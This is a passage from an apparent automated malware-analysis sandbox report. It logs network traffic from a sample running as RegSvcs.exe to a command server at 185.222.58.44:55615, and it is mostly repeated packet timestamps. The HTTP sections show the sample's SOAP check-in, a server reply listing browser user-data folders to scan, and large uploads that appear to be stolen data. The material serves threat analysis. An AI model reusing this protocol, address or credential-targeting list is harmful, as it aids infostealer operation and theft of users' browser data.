                                                                                                                                              Feb 21, 2025 19:26:45.935393095 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935442924 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935565948 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935578108 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935589075 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935600996 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935621977 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935633898 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935655117 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935666084 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935686111 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935699940 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935728073 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935739040 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935785055 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935796022 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935818911 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935859919 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935870886 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935904980 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935915947 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935926914 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935960054 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.935971022 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936003923 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936014891 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936063051 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936074972 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936103106 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936114073 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936147928 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936158895 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936218977 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936229944 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936265945 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936294079 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936331034 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936342001 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936383009 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936394930 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936422110 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936434031 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936465025 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936475992 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936522007 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936533928 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936642885 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936654091 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936685085 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936696053 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936780930 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936791897 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936826944 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936839104 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936882019 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936893940 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936908007 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936919928 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936979055 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.936990976 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937066078 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937077999 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937098980 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937109947 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937130928 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937141895 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937201977 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937212944 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937233925 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937246084 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937288046 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937299967 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937334061 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937345982 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937359095 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937380075 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937427998 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937438965 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937485933 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937498093 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937510967 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937530994 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937587023 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937598944 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937628031 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937639952 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937685013 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937697887 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937741041 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937752962 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937772989 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937784910 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937822104 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937843084 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937925100 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937937021 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937958956 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.937971115 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938011885 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938024044 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938045025 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938055992 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938106060 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938117981 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938158035 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938169956 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938183069 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938245058 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938321114 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938427925 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938440084 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938452959 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938504934 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938517094 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938553095 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938607931 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938653946 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938725948 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938788891 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938858986 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938886881 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938899040 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.938990116 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939002037 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939064026 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939085007 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939152002 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939415932 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939501047 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939580917 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939646959 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939660072 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939711094 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939755917 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939769030 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939826965 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939866066 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939907074 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.939920902 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940016031 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940028906 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940087080 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940164089 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940176010 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940246105 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940290928 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940304995 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940355062 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940380096 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940457106 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940471888 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940545082 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940563917 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940598965 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940629005 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940691948 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940706968 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940778017 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940814972 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940826893 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940881014 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940941095 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940954924 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.940994978 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.941088915 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.941101074 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.941162109 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.941242933 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.941291094 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.941742897 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.941818953 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.941921949 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.941973925 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.942044020 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.942095041 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.942246914 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.942369938 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.942382097 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.942394972 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.942462921 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:45.942567110 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:45.942859888 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.942914963 CET4973855615192.168.2.4185.222.58.44
                                                                                                                                              Feb 21, 2025 19:26:45.947510004 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.947582006 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.947593927 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.947887897 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:45.948010921 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:46.657716036 CET5561549738185.222.58.44192.168.2.4
                                                                                                                                              Feb 21, 2025 19:26:46.693428040 CET4973855615192.168.2.4185.222.58.44

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Feb 21, 2025 19:26:41.251378059 CET5025553192.168.2.41.1.1.1
                                                                                                                                              Feb 21, 2025 19:26:41.258898973 CET53502551.1.1.1192.168.2.4

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              Feb 21, 2025 19:26:41.251378059 CET192.168.2.41.1.1.10xddd0Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              Feb 21, 2025 19:26:41.258898973 CET1.1.1.1192.168.2.40xddd0No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Feb 21, 2025 19:26:41.258898973 CET1.1.1.1192.168.2.40xddd0No error (0)api.ip.sb.cdn.cloudflare.net104.26.12.31A (IP address)IN (0x0001)false
                                                                                                                                              Feb 21, 2025 19:26:41.258898973 CET1.1.1.1192.168.2.40xddd0No error (0)api.ip.sb.cdn.cloudflare.net104.26.13.31A (IP address)IN (0x0001)false
                                                                                                                                              Feb 21, 2025 19:26:41.258898973 CET1.1.1.1192.168.2.40xddd0No error (0)api.ip.sb.cdn.cloudflare.net172.67.75.172A (IP address)IN (0x0001)false

                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • api.ip.sb
                                                                                                                                              • 185.222.58.44:55615

                                                                                                                                              HTTP Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.449734185.222.58.44556157452C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Feb 21, 2025 19:26:35.317444086 CET240OUTPOST / HTTP/1.1
                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                              SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                              Host: 185.222.58.44:55615
                                                                                                                                              Content-Length: 137
                                                                                                                                              Expect: 100-continue
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Feb 21, 2025 19:26:35.907294989 CET359INHTTP/1.1 200 OK
                                                                                                                                              Content-Length: 212
                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                              Date: Fri, 21 Feb 2025 18:26:35 GMT
                                                                                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                              Feb 21, 2025 19:26:40.975482941 CET223OUTPOST / HTTP/1.1
                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                              SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                                              Host: 185.222.58.44:55615
                                                                                                                                              Content-Length: 144
                                                                                                                                              Expect: 100-continue
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Feb 21, 2025 19:26:41.172713995 CET1236INHTTP/1.1 200 OK
                                                                                                                                              Content-Length: 4744
                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                              Date: Fri, 21 Feb 2025 18:26:41 GMT
                                                                                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.2.449738185.222.58.44556157452C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Feb 21, 2025 19:26:44.425841093 CET221OUTPOST / HTTP/1.1
                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                              SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                              Host: 185.222.58.44:55615
                                                                                                                                              Content-Length: 933417
                                                                                                                                              Expect: 100-continue
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Feb 21, 2025 19:26:45.912023067 CET294INHTTP/1.1 200 OK
                                                                                                                                              Content-Length: 147
                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                              Date: Fri, 21 Feb 2025 18:26:45 GMT
                                                                                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                                              Feb 21, 2025 19:26:45.921417952 CET217OUTPOST / HTTP/1.1
                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                              SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                              Host: 185.222.58.44:55615
                                                                                                                                              Content-Length: 933409
                                                                                                                                              Expect: 100-continue
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Feb 21, 2025 19:26:46.657716036 CET408INHTTP/1.1 200 OK
                                                                                                                                              Content-Length: 261
                                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                              Date: Fri, 21 Feb 2025 18:26:45 GMT
